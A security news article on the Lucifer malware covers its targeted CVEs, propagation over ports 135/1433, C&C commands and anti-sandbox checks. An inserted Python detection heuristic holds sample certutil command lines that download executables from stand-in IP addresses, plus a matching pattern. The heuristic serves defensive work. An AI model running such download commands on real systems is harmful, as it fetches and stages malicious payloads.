Hybrid Malware ‘Lucifer’ Includes Cryptojacking, DDoS Capabilities

A recently identified piece of cryptojacking malware includes functionality that enables its operators to launch distributed denial of service (DDoS) attacks, Palo Alto Networks reports.

Dubbed Lucifer, the malware was first observed on May 29, as part of a campaign that is still ongoing, but which switched to an upgraded variant on June 11.

The threat was designed to drop XMRig for mining Monero. It can also propagate on its own by targeting various vulnerabilities, supports command and control (C&C) operations, and drops and runs EternalBlue, EternalRomance, and the DoublePulsar backdoor on vulnerable targets for intranet infections.

Lucifer, Palo Alto Networks security researchers reveal, targets a long list of critical and high-severity vulnerabilities, in software such as Rejetto HTTP File Server, Jenkins, Oracle Weblogic, Drupal, Apache Struts, Laravel, and Windows.

Targeted security flaws are CVE-2014-6287, CVE-2018-1000861, CVE-2017-10271, CVE-2018-20062, CVE-2018-7600, CVE-2017-9791, CVE-2019-9081, PHPStudy Backdoor RCE, CVE-2017-0144, CVE-2017-0145, and CVE-2017-8464.

Successful exploitation of these bugs provides attackers with the ability to execute code on the target machines. Although software updates to address these issues have been available for some time, many systems remain unpatched and exposed to attacks.

The malware contains three resource sections, each containing a binary for a specific purpose: x86 and x64 UPX-packed versions of XMRig 5.5.0, and Equation Group exploits (EternalBlue and EternalRomance, and the DoublePulsar backdoor implant).

Once it has infected a machine, Lucifer proceeds to gain persistence by setting specific registry key values. The malware enables itself with debug privilege and begins operation by launching several threads.

For propagation, the malware scans for open TCP ports 135 (RPC) and 1433 (MSSQL) and attempts to gain access by trying commonly used credentials, by using the Equation Group exploits, or by sending HTTP requests to probe for exposed, externally reachable systems. The payloads delivered to identified vulnerable systems fetch a replica of the malware via certutil.
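Two of the propagation behaviours described above (port 135/1433 sweeps from a single source, and certutil used as a downloader) are easy to surface from telemetry. The following is an added detection example, not code from the Palo Alto Networks report; the flow and process records, the log shapes and the sweep threshold are constructed assumptions.

```python
"""Added example: heuristics for the Lucifer propagation pattern
(TCP 135/1433 fan-out and certutil-based payload fetch).
Record formats and thresholds are constructed, not from the report."""
import re
from collections import defaultdict

# Constructed flow records: (src_ip, dst_ip, dst_port)
FLOWS = (
    [("10.0.0.5", f"10.0.1.{i}", 1433) for i in range(1, 30)]   # 29 MSSQL probes
    + [("10.0.0.5", f"10.0.2.{i}", 135) for i in range(1, 10)]  # 9 RPC probes
    + [("10.0.0.9", "10.0.1.20", 1433),  # one DB connection, benign
       ("10.0.0.9", "10.0.1.21", 443)]
)

# Constructed process-creation records: (host, parent_image, command_line)
PROCS = [
    ("ws01", "cmd.exe",
     "certutil.exe -urlcache -split -f http://203.0.113.7/x.exe C:\\Users\\Public\\x.exe"),
    ("ws02", "explorer.exe", "certutil.exe -verify mycert.cer"),   # legitimate use
    ("ws03", "powershell.exe", "certutil -urlcache -f https://198.51.100.4/a a.exe"),
]

SWEEP_PORTS = {135, 1433}
SWEEP_THRESHOLD = 20  # distinct (host, port) targets per source; tune per environment


def sweeping_sources(flows, threshold=SWEEP_THRESHOLD):
    """Return {src: distinct-target-count} for sources fanning out on 135/1433."""
    targets = defaultdict(set)
    for src, dst, port in flows:
        if port in SWEEP_PORTS:
            targets[src].add((dst, port))
    return {s: len(t) for s, t in targets.items() if len(t) >= threshold}


# certutil with -urlcache and a URL argument indicates a remote fetch,
# which is how the report says the payload retrieves a copy of the malware.
CERTUTIL_FETCH = re.compile(r"certutil(?:\.exe)?\s.*-urlcache\s.*https?://", re.I)


def certutil_downloads(procs):
    """Return hosts whose process logs show certutil used as a downloader."""
    return [host for host, _parent, cmd in procs if CERTUTIL_FETCH.search(cmd)]
```

A single MSSQL connection stays below the threshold, while the constructed 10.0.0.5 source (38 distinct targets) and the two certutil download invocations are flagged.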

After all worker threads are launched, the malware enters an infinite loop to handle C&C operation. Based on commands received from the server, it can launch TCP/UDP/HTTP DoS attacks, download and execute files, execute commands, enable/disable the miner’s status report functionality, enable flags related to the miner, or reset the flags and terminate the miner.

The Stratum protocol on port 10001 is used for communication between the cryptojacking bot and its mining server.

The upgraded version of the malware has the same capabilities and behavior as its predecessor, but adds an anti-sandbox check: it compares the username and computer name of the infected host against a predefined list, looks for specific device drivers, DLLs and virtual devices, and halts operation if a match is found. It also includes anti-debugger capabilities.

“Lucifer is a new hybrid of cryptojacking and DDoS malware variant that leverages old vulnerabilities to spread and perform malicious activities on Windows platforms. Applying the updates and patches to the affected software [is] strongly advised,” Palo Alto Networks concludes.

Related: ‘Graboid’ Crypto-Jacking Worm Targets Docker Hosts

Related: Interpol Announces Successful Operation Against Cryptojacking in Southeast Asia

Written By

Ionut Arghire is an international correspondent for SecurityWeek.